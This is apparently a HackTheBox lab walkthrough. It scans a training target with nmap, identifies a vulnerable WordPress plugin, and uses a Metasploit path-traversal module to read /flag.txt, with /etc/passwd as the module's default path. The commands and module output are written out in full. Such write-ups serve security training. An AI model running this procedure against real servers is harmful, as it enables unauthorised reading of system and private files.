Public Exploits
ℹ️ Informations¶
- 🌐 Website: HackTheBox
- 📚 Module: Getting Started
- 🔗 Link: Public Exploits
❓Question¶
Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file. (note: the web server may take a few seconds to start)
📋 Walkthrough¶
Run nmap scan:
We get this result:PORT STATE SERVICE VERSION
45441/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Getting Started – Just another WordPress site
|_http-generator: WordPress 5.6.1
|_http-server-header: Apache/2.4.41 (Ubuntu)
****** ****** Plugin 2.*.* for W********. We can try to search online an exploit for this plugin. It seems to be vulnerable. We will try to exploit it using Metasploit Framework (as the module want to). Search for that plugin msf6> search ***** plugin w********
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/http/wp_******_******_file_read . normal No WordPress ****** ****** File Read Vulnerability
msf6> use 0
msf6 auxiliary(scanner/http/wp_******_******_file_read) >
msf6 auxiliary(scanner/http/wp_******_******_file_read) > show options
Module options (auxiliary/scanner/http/wp_******_******_file_read):
Name Current Setting Required Description
---- --------------- -------- -----------
DEPTH 6 yes Traversal Depth (to reach the root folder)
FILEPATH /etc/passwd yes The path to the file to read
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.
html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the wordpress application
THREADS 1 yes The number of concurrent threads (max one per host)
VHOST no HTTP server virtual host
RHOST (Remote Host), RPORT (Remote Port) and FILEPATH because the question say the flag is in /flag.txt msf6 auxiliary(scanner/http/wp_******_******_file_read) > set rhosts [IP]
rhosts => [IP]
msf6 auxiliary(scanner/http/wp_******_******_file_read) > set rport 45441
rport => 45441
msf6 auxiliary(scanner/http/wp_******_******_file_read) > set filepath /flag.txt
filepath => /flag.txt
msf6 auxiliary(scanner/http/wp_******_******_file_read) >
show options if all is ok msf6 auxiliary(scanner/http/wp_******_******_file_read) > show options
Module options (auxiliary/scanner/http/wp_******_******_file_read):
Name Current Setting Required Description
---- --------------- -------- -----------
DEPTH 6 yes Traversal Depth (to reach the root folder)
FILEPATH /flag.txt yes The path to the file to read
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS [IP] yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.
html
RPORT 45441 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the wordpress application
THREADS 1 yes The number of concurrent threads (max one per host)
VHOST no HTTP server virtual host
msf6 auxiliary(scanner/http/wp_******_******_file_read) > run
[+] File saved in: /home/kali/.msf4/loot/20240824125258_default_94.237.49.212_simplebackup.tra_781127.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Answer
HTB{************}